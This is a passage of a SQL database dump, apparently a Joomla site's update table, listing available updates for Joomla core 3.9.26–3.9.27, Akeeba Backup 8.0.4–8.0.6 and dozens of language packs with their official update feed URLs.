package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28691,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28692,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28693,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28694,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28695,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28696,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28697,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28698,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28699,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28700,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28701,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28702,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28703,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28704,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28705,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28706,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28707,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28708,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28709,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28710,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28711,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28712,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28713,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28714,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28715,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28716,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28717,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28718,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28719,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28720,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28721,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28722,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28723,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28724,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28725,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28726,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28727,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28728,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28729,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28730,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28731,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28732,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28733,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28734,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28735,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28736,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28737,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28738,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28739,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28740,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28741,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28742,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28743,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28744,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28745,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28746,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28747,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28748,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28749,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28750,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28751,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28752,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28753,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28754,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28755,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28756,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28757,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28758,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28759,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28760,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28761,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28762,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28763,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28764,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28765,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28766,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28767,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28768,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28769,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28770,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28771,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28772,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28773,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28774,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28775,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28776,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28777,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28778,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28779,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28780,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28781,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28782,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28783,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28784,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28785,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28786,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28787,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28788,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28789,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28790,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28791,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28792,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28793,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28794,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28795,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28796,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28797,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28798,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28799,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28800,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28801,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28802,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28803,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28804,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28805,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28806,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28807,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28808,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28809,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28810,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28811,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28812,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28813,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28814,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28815,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28816,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28817,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28818,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28819,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28820,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28821,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28822,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28823,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28824,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28825,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28826,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28827,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28828,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28829,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28830,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28831,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28832,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28833,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28834,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28835,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28836,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28837,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28838,3,0,'French','','pkg_fr-FR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28839,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28840,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28841,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28842,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28843,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28844,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28845,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28846,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28847,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28848,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28849,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28850,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28851,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28852,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28853,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28854,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28855,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28856,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28857,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28858,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28859,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28860,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28861,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28862,3,0,'English US','','pkg_en-US','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28863,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28864,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28865,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28866,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28867,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28868,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28869,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28870,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28871,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28872,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28873,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28874,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28875,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28876,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28877,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28878,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.27.2','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28879,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28880,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28881,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28882,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28883,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28884,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28885,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28886,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28887,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28888,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28890,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28891,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28892,57,0,'French','','pkg_fr-FR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28893,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28894,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28895,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28896,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28897,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28898,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28899,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28900,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28901,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28902,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28903,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28904,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28905,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28906,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28907,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28908,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28909,57,0,'Norwegian 